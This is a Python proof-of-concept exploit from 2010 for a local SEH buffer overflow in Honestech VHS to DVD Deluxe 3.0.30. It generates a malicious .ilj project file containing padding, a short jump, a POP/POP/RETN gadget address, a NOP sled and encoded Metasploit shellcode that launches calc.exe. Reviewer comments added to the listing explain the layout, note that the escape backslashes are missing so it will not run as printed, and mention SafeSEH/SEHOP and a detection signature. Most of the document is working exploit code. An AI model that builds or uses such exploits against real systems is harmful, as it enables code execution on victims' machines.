# Title : Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
# Published : 2010-09-16
# Author : Brennon Thomas
#!/usr/bin/python
#
# Exploit Title: Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
# Date: September 16, 2010
# Author: Brennon Thomas thomab310@gmail.com
# Software Link: n/a
# Version: <= 3.0.30.0 Deluxe
# Tested on: Windows XP SP2/SP3 using Honestech VHS to DVD 3.0.2 and 3.0.30.0
#
# Usage: This python script generates the malicious .ilj project file.
# Open Honestech VHS to DVD <= 3.0.30 Deluxe in Advanced mode and
# load the corrupt file.
#
# Exploit is for education purposes only. Author takes no responsibility
# for what you do with it.
# Reviewer notes (defensive reading of this proof of concept):
# As rendered on this page the escape sequences have lost their backslashes
# ("rn", "x90", "xeb"...), so the first literal runs across many lines and the
# listing is not valid Python as printed. Read it as documentation of the
# crafted file layout rather than as a runnable script.
# The generated .ilj is an INI-style project file. The overlong input is
# delivered through the FILE= entry of the [FILELIST] section: the first
# literal ends mid-value at "FILE=E:\" and the remaining comma-separated
# fields of that entry are appended after the padding and payload below.
#
# Required file text: the sections the application expects to find in a
# project file before it reaches the FILE= value.
buf = "rn
rn
<CAPTURE>rn
rn
[MAINDLG]rn
PAGE=0rn
rn
[AVICODEC]rn
VIDEOCODEC=DivX 6.8.5 Codec (2 Logical CPUs)rn
AUDIOCODEC=MPEG Layer-3rn
rn
[WMVINFO]rn
TITLE= rn
AUTHOR= rn
COPYRIGHT= rn
DESCRIPTION= rn
rn
[CAPTUREINFO]rn
OUTPUTFOLDER=E:\misc\rn
STATE=0,1,1,0,4396,4,1,0,0rn
rn
[BURNINFO]rn
STATE=0,0,0,0,0,0rn
TEMPFOLDER=E:\misc\rn
VIDEOTSFOLDER=E:\misc\rn
IMAGEFOLDER=E:\misc\rn
rn
[FILELIST]rn
FILE=E:\"
buf += "x90"*257 #Junk: 257 filler bytes (0x90 = NOP) that, per the author's layout, reach the SEH record on the stack
buf += "xebx08x90x90" #Next-SEH slot: JMP SHORT +8 (skips the handler address), NOP padded - as the author's original comment states
buf += "xbax25x31x58" #Handler slot: POP,POP,RETN gadget in msg723.acm (per author). Mitigation to verify on deployed hosts: a SafeSEH-built module or SEHOP stops this kind of handler overwrite
buf += "x90"*16 #NOP sled immediately ahead of the payload
# Payload: Metasploit windows/exec CMD=calc.exe, i.e. the benign "pop calc"
# proof of concept, encoded with shikata_ga_nai (228 bytes per the log line
# below). Excluded bytes 0x00, 0x0a, 0x0d, 0x2c: NUL/LF/CR would terminate the
# value line; 0x2c (',') presumably because the .ilj parser splits fields on
# commas, as the STATE= lines above and the trailing fields below suggest -
# TODO confirm.
#msfpayload windows/exec CMD=calc.exe R | msfencode -a x86 -b 'x00x0ax0dx2c' -t c
#[*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)
buf += ("xbexf9x89xfaxaaxdbxcaxd9x74x24xf4x33xc9xb1x33"
"x5dx31x75x13x83xedxfcx03x75xf6x6bx0fx56xe0xe5"
"xf0xa7xf0x95x79x42xc1x87x1ex06x73x18x54x4ax7f"
"xd3x38x7fxf4x91x94x70xbdx1cxc3xbfx3ex91xcbx6c"
"xfcxb3xb7x6exd0x13x89xa0x25x55xcexddxc5x07x87"
"xaax77xb8xacxefx4bxb9x62x64xf3xc1x07xbbx87x7b"
"x09xecx37xf7x41x14x3cx5fx72x25x91x83x4ex6cx9e"
"x70x24x6fx76x49xc5x41xb6x06xf8x6dx3bx56x3cx49"
"xa3x2dx36xa9x5ex36x8dxd3x84xb3x10x73x4fx63xf1"
"x85x9cxf2x72x89x69x70xdcx8ex6cx55x56xaaxe5x58"
"xb9x3axbdx7ex1dx66x66x1ex04xc2xc9x1fx56xaaxb6"
"x85x1cx59xa3xbcx7ex34x32x4cx05x71x34x4ex06xd2"
"x5cx7fx8dxbdx1bx80x44xfaxd3xcaxc5xabx7bx93x9f"
"xe9xe6x24x4ax2dx1exa7x7fxcexe5xb7xf5xcbxa2x7f"
"xe5xa1xbbx15x09x15xbcx3fx6axf8x2exa3x43x9fxd6"
"x46x9cx55")
buf += "x90"*(6000-(len(buf))) #Pad so that preamble + FILE= value totals 6000 bytes. Detection hint: a FILE= value several KB long and dominated by one repeated byte is a simple signature for a crafted .ilj
buf += ",0,7462,885953024,4,1,640,480rn" #Required file text: the remaining comma-separated fields of the FILE= entry so the line still parses
# Output is written as sploit.ilj in the current working directory; the
# handle is closed explicitly (no context manager in this 2010-era script).
f = open("sploit.ilj", "w")
f.write(buf)
f.close()